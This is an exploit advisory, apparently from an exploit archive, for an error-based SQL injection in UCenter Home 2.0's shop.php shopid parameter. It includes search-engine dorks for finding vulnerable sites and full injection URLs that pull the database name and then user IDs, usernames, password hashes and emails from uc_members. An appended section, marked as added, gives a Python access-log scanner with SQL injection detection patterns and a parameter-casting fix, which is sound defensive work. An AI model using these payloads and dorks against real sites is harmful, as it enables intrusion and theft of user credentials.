__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
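
Added example (not part of the original advisory, and not UCenter Home code): a Python log check a defender can run over web-server access logs to flag requests to shop.php whose shopid parameter is not a plain integer, and to label those carrying the error-based fragments seen in the payloads above (floor(rand(...)), information_schema, group by). The combined-log-format layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Fragments typical of the MySQL error-based technique quoted in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"\bselect\b")]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_shopid(value):
    """Return 'ok' for a plain ASCII integer, otherwise name the anomaly."""
    if value.isascii() and value.isdigit():
        return "ok"
    hits = sum(1 for m in MARKERS if m.search(value))
    return "error-based-sqli" if hits >= 2 else "non-numeric"

def scan(log_lines):
    """Return (client_ip, verdict) for every suspicious shopid sent to shop.php."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs URL-decodes, so %20 and + in the logged target become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            verdict = classify_shopid(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict))
    return findings

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253abc HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?shopid=1%20select HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer-only rule in classify_shopid is the server-side fix for this parameter: reject or cast shopid before it reaches any SQL statement, and bind it as a query parameter rather than concatenating it.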